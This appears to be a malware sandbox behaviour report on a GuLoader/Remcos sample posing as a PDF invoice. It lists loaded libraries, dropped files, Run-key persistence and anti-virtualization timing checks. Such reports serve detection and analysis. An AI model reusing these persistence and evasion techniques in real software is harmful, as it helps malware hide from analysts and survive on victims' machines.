Source: C:\ProgramData\Remcos\remcos.exe	Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: textshaping.dll	Jump to behavior

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.1534421307.00000000067BC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2759956391.00000000066BC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Code function: 0_2_6EB82288 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_6EB82288

Source: C:\ProgramData\Remcos\remcos.exe	File created: C:\Users\user\AppData\Local\Temp\nsg5579.tmp\System.dll	Jump to dropped file
Source: C:\ProgramData\Remcos\remcos.exe	File created: C:\Users\user\AppData\Local\Temp\nssA4F1.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	File created: C:\ProgramData\Remcos\remcos.exe	Jump to dropped file
Source: C:\ProgramData\Remcos\remcos.exe	File created: C:\Users\user\AppData\Local\Temp\nsd1A26.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsi4F73.tmp\System.dll	Jump to dropped file

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

File created: C:\ProgramData\Remcos\remcos.exe

Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-4U257D

Jump to behavior

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-4U257D	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-4U257D	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-4U257D	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-4U257D	Jump to behavior

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	API/Special instruction interceptor: Address: 685503A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	API/Special instruction interceptor: Address: 301503A
Source: C:\ProgramData\Remcos\remcos.exe	API/Special instruction interceptor: Address: 675503A
Source: C:\ProgramData\Remcos\remcos.exe	API/Special instruction interceptor: Address: 301503A

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	RDTSC instruction interceptor: First address: 6814C39 second address: 6814C39 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FB129233DAFh 0x00000006 test dx, ax 0x00000009 inc ebp 0x0000000a test bl, FFFFFFECh 0x0000000d inc ebx 0x0000000e cmp eax, 1CBCAFA4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	RDTSC instruction interceptor: First address: 2FD4C39 second address: 2FD4C39 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FB129233B7Fh 0x00000006 test dx, ax 0x00000009 inc ebp 0x0000000a test bl, FFFFFFECh 0x0000000d inc ebx 0x0000000e cmp eax, 1CBCAFA4h 0x00000013 rdtsc
Source: C:\ProgramData\Remcos\remcos.exe	RDTSC instruction interceptor: First address: 6714C39 second address: 6714C39 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FB129233DAFh 0x00000006 test dx, ax 0x00000009 inc ebp 0x0000000a test bl, FFFFFFECh 0x0000000d inc ebx 0x0000000e cmp eax, 1CBCAFA4h 0x00000013 rdtsc
Source: C:\ProgramData\Remcos\remcos.exe	RDTSC instruction interceptor: First address: 2FD4C39 second address: 2FD4C39 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FB129233B7Fh 0x00000006 test dx, ax 0x00000009 inc ebp 0x0000000a test bl, FFFFFFECh 0x0000000d inc ebx 0x0000000e cmp eax, 1CBCAFA4h 0x00000013 rdtsc

Source: C:\ProgramData\Remcos\remcos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg5579.tmp\System.dll	Jump to dropped file
Source: C:\ProgramData\Remcos\remcos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssA4F1.tmp\System.dll	Jump to dropped file
Source: C:\ProgramData\Remcos\remcos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd1A26.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi4F73.tmp\System.dll	Jump to dropped file

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Evaded block: after key decision			graph_0-4407
Source: C:\ProgramData\Remcos\remcos.exe	Evaded block: after key decision			graph_14-3477

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 0_2_00406354 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00406354
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 0_2_00406214 FindFirstFileA,FindClose,	0_2_00406214
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 0_2_004029DA FindFirstFileA,	0_2_004029DA
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 9_2_00406354 DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	9_2_00406354
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 9_2_00406214 FindFirstFileA,FindClose,	9_2_00406214
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	Code function: 9_2_004029DA FindFirstFileA,	9_2_004029DA
Source: C:\ProgramData\Remcos\remcos.exe	Code function: 14_2_00406354 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	14_2_00406354
Source: C:\ProgramData\Remcos\remcos.exe	Code function: 14_2_00406214 FindFirstFileA,FindClose,	14_2_00406214
Source: C:\ProgramData\Remcos\remcos.exe	Code function: 14_2_004029DA FindFirstFileA,	14_2_004029DA

Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.00000000049E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.00000000049E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.00000000049A8000.00000004.00000020.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290 pdf.bat.exe, 00000009.00000002.1673415355.0000000004A08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe	API call chain: ExitProcess graph end node			graph_0-4300
Source: C:\ProgramData\Remcos\remcos.exe	API call chain: ExitProcess graph end node			graph_14-3365

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Code function: 0_2_0040154A PostQuitMessage,LdrInitializeThunk,Sleep,SetForegroundWindow,LdrInitializeThunk,ShowWindow,ShowWindow,ShowWindow,SetFileAttributesA,GetFileAttributesA,SetCurrentDirectoryA,MoveFileA,GetFullPathNameA,GetShortPathNameA,SearchPathA,lstrcatA,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatA,

0_2_0040154A

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

0_2_6EB82288

